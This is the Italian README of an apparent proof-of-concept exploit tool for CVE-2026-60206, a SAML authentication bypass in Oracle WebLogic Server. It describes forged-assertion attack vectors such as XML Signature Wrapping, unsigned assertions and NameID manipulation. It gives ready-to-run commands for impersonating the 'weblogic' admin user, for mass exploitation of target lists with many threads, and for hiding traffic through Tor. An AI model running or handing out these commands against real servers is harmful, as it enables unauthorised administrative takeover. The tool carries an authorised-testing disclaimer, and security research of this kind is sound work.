
Analisi tecnica e Proof-of-Concept per CVE-2026-60206, una vulnerabilità critica di bypass dell'autenticazione SAML in Oracle WebLogic Server.
Questo repository fornisce un exploit proof-of-concept per CVE-2026-60206, una vulnerabilità critica di bypass dell'autenticazione nell'implementazione SAML di Oracle WebLogic Server. La falla consente a un attaccante remoto con privilegi bassi di compromettere completamente il server falsificando le asserzioni SAML.
⚠️ Disclaimer: Questo strumento è destinato esclusivamente a ricerca e test di sicurezza autorizzati. Usalo solo contro sistemi di tua proprietà o per i quali hai un'autorizzazione esplicita. Gli autori declinano ogni responsabilità per un uso improprio.
CVE-2026-60206 interessa il componente Core di Oracle WebLogic Server. La vulnerabilità deriva da una gestione impropria dell'autenticazione nell'implementazione del protocollo SAML. Molteplici vettori d'attacco — come XML Signature Wrapping (XSW), accettazione di asserzioni non firmate, manipolazione di NameID e bypass di audience/conditions — consentono a un attaccante di impersonare utenti arbitrari (ad es. weblogic) e ottenere accesso amministrativo.
Versioni interessate:
Il PoC implementa i seguenti vettori d'attacco:
WantAssertionsSigned non è applicato).AudienceRestriction per ampliare l'ambito.NotBefore/NotOnOrAfter per aggirare i controlli di validità.all, unsigned, xsw, nameid, audience, conditions, combo o replay.-l).-r).httpx se installato, altrimenti ripiega su requests (HTTP/1.1).--save-payloads).-c / --check) – determina rapidamente se un target è vulnerabile (non exploit).git clone https://github.com/Debajyoti0-0/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt
Richiesti: requests, urllib3
Opzionali (migliorano le funzionalità):
httpx – per il supporto HTTP/2lxml – per un parsing SAML potenziatosignxml, cryptography – per la gestione delle firme (non richiesti per lo sfruttamento)python CVE-2026-60206.py -t https://192.168.1.100:7002 --detect
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode all -u weblogic
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode combo -u admin
python CVE-2026-60206.py -l targets.txt -o results.json
python CVE-2026-60206.py -l targets.txt --exploit -o results.csv --threads 20
python CVE-2026-60206.py -t https://192.168.1.100:7002 --mode replay --replay-file captured.xml
python CVE-2026-60206.py -t https://192.168.1.100:7002 --tor --check-tor
python CVE-2026-60206.py -t https://192.168.1.100:7002 -r request.txt --method POST
python CVE-2026-60206.py -t https://192.168.1.100:7002 -c
| Flag | Description |
|---|---|
-h, --help | Mostra il messaggio di aiuto ed esci. |
--proxy PROXY | URL del proxy (sostituito da --tor se usato). |
--no-verify | Disabilita la verifica del certificato SSL. |
--cookie COOKIE | Cookie di sessione (ad es., name=value; name2=value2). |
--auth AUTH | Credenziali di autenticazione di base (USER:PASS). |
| Flag | Description |
|---|---|
-t, --target TARGET | URL di un singolo target (ad es., https://host:7002). |
-l, --list LIST | File con elenco di target per scansione di massa, o singolo URL. |
-f, --file FILE | Alias di --list. |
| Flag | Description |
|---|---|
-r, --requestfile REQUESTFILE | Carica una richiesta HTTP grezza da file (sostituisce gli attacchi SAML). |
--method METHOD | Metodo HTTP da usare (per richiesta grezza o richiesta singola; default: GET). |
--random-agent | Usa uno User‑Agent casuale dall'elenco integrato. |
-A, --user-agent USER_AGENT | Valore personalizzato per l'header User‑Agent. |
--tor | Usa la rete di anonimato Tor (SOCKS5 di default). |
--tor-port TOR_PORT | Porta del proxy Tor (default: 9050). |
--tor-type {HTTP,SOCKS4,SOCKS5} | Tipo di proxy Tor (default: SOCKS5). |
--check-tor | Verifica che Tor sia usato correttamente (esce con un verdetto). |
--delay DELAY | Ritardo in secondi tra ogni richiesta. |
--timeout TIMEOUT | Timeout in secondi (default: 30). |
--retries RETRIES | Numero di tentativi in caso di timeout/errori (default: 3). |
--retry-on RETRY_ON | Ripeti la richiesta se il contenuto della risposta corrisponde alla regex (ad es., 'captcha'). |
-dr, --disable-redirects | Disabilita il seguito dei redirect HTTP. |